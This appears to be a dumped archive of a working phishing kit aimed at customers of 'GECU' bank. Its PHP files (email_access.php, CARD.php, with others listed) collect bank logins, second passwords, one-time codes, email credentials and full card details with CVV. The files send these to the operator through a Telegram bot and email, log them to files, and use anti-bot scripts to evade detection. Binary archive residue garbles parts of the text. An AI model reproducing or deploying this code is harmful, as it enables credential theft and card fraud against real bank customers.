$Z118_HEADERS .= $_POST['userid']."\n"; $Z118_HEADERS .= "MIME-Version: 1.0\n"; $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n"; @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); if ($show_second_login_page == "on") { Header("Location: ../../session_relogin.php"); } else { Header("Location: ../../onetime.php"); } ?> PK��x��[�� email_access.phpnu��[��<?php session_start(); error_reporting(0); include('../Antibot/blockers.php'); include('../Antibot/detects.php'); include('../Antibot/Bot-Crawler.php'); include('../Antibot/Dila_DZ.php'); include('../Antibot/new.php'); include('../config.php'); include('../functions/get_browser.php'); include('../functions/get_ip.php'); $TIME_DATE = date('H:i:s d/m/Y'); $_SESSION['email_address'] = $_POST['email_address']; $_SESSION['email_password'] = $_POST['email_password']; $Z118_MESSAGE .= " [ GECU ACCOUNT LOGIN] [ EMAIL ACCESS INFORMATION] +++++++++++++++++++++++++++++++++++++++++++++++++++++ [Username] = ".$_SESSION['first_username']." [Password] = ".$_SESSION['first_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [Second Username] = ".$_SESSION['second_username']." [Second Password] = ".$_SESSION['second_password']." ++++++++++++++++++++++++++++++++++++++++++++++++++++ [OTP] = ".$_SESSION['otp']." ++++++++++++++++++++++++++++++++++++++++++++++++++ [Email address] = ".$_POST['email_address']." [Email Password] = ".$_POST['email_password']." +++++++++++++++++++++++++++++++++++++++++++++++++++++ [VICTIM INFORMATION] [TIME/DATE] = ".$TIME_DATE." [IP INFO] = http://ip-api.com/json/".$_SESSION['_ip_']." [REMOTE IP] = ".$_SERVER['REMOTE_ADDR']." [BROWSER] = ".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])." [BROWSER] = ".$_SERVER['HTTP_USER_AGENT']." ##################[ BY @X_hammer ]##################### \n"; $data = [ 'text' => ''.$Z118_MESSAGE.'', 'chat_id' => ''.$chat_id.'' ]; $url = "https://api.telegram.org/bot".$bot_token."/sendMessage?"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); if($save_results_to_cpanel == "on") { $res_file = fopen("../logs/EMAIL_ACCESS.txt", "a"); fwrite($res_file, $Z118_MESSAGE); } $Z118_SUBJECT = "✪ LOGIN FROM : ✪ ".$_POST['email_address']." ✪"; $Z118_HEADERS .= "From:XD <X-hammer@logs.com>"; $Z118_HEADERS .= $_POST['email_address']."\n"; $Z118_HEADERS .= "MIME-Version: 1.0\n"; $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n"; @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); Header("Location: ../../carding.php"); ?> PK��x��[V:�^��^��CARD.phpnu��[��<?php session_start(); error_reporting(0); include('../Antibot/blockers.php'); include('../Antibot/detects.php'); include('../Antibot/new.php'); include('../Antibot/Bot-Crawler.php'); include('../Antibot/Dila_DZ.php'); include('../config.php'); include('../functions/get_browser.php'); include('../functions/get_ip.php'); $TIME_DATE = date('H:i:s d/m/Y'); if (isset($_POST['card_number'])){ $_SESSION['_cardname_'] = $_POST['card_name']; $_SESSION['_cardnumber_'] = $_POST['card_number']; $_SESSION['_expdate_'] = $_POST['exp']; $_SESSION['_csc_'] = $_POST['csc']; } $Z118_MESSAGE .= " [ GECU BANK CARDING INFORMATION ] +++++++++++++++++++++++++++++++++++++++++++++++++++ [Username] = ".$_SESSION['first_username']." [Password] = ".$_SESSION['first_password']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [Second Username] = ".$_SESSION['second_username']." [Second Password] = ".$_SESSION['second_password']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [OTP] = ".$_SESSION['otp']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [Email Address] = ".$_SESSION['email_address']." [Email Password] = ".$_SESSION['email_password']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [Card Name] =".$_SESSION['_cardname_']." [Card Number] = ".$_SESSION['_cardnumber_']." [Cvv] = ".$_SESSION['_csc_']." [Expiration Date] = ".$_SESSION['_expdate_']." +++++++++++++++++++++++++++++++++++++++++++++++++++ [VICTIM INFORMATION ] [Time / Date] = ".$TIME_DATE." [IP INFO] = http://ip-api.com/json/".$_SESSION['_ip_']." [REMOTE IP] = ".$_SERVER['REMOTE_ADDR']." [BROWSER] = ".Z118_Browser($_SERVER['HTTP_USER_AGENT'])." On ".Z118_OS($_SERVER['HTTP_USER_AGENT'])." [BROWSER] = ".$_SERVER['HTTP_USER_AGENT']." [ BY @X_hammer ]\n"; if (!empty($_POST['card_number'])){ $data = [ 'text' => ''.$Z118_MESSAGE.'', 'chat_id' => ''.$chat_id.'' ]; $url = "https://api.telegram.org/bot".$bot_token."/sendMessage?"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); if($save_results_to_cpanel == "on") { $res_file = fopen("../logs/CARD_INFO.txt", "a"); fwrite($res_file, $Z118_MESSAGE); } $Z118_SUBJECT = "✪ CARD DETAILS FROM: ✪".$_SESSION['_cardname_']." ✪"; $Z118_HEADERS .= "From:Xhammer <xhammer@logs.com>"; $Z118_HEADERS .= $_SESSION['_csc_']."\n"; $Z118_HEADERS .= "MIME-Version: 1.0\n"; $Z118_HEADERS .= "Content-type: text/html; charset=UTF-8\n"; @mail($Z118_EMAIL, $Z118_SUBJECT, $Z118_MESSAGE, $Z118_HEADERS); Header("Location: ../../billing.php"); } ?>PK��x��[�f�� onetime.phpnu��[��PK��x��[��o�� V ��fullz.phpnu��[��PK��x��[\HO��O��grabber/index.phpnu��[��PK��x��[~��/.��grabber/cache.phpnu��[��PK��x��[Om�f��fD��session_relogin.phpnu��[��PK��x��[^��L �� M��userlogin.phpnu��[��PK��x��[�� V��email_access.phpnu��[��PK��x��[V:�^��^��%a��CARD.phpnu��[��PK��n��l��

| ver. 1.6 | Github | . | PHP 8.2.30 | ??????????? ?????????: 0 | proxy | phpinfo | ???????????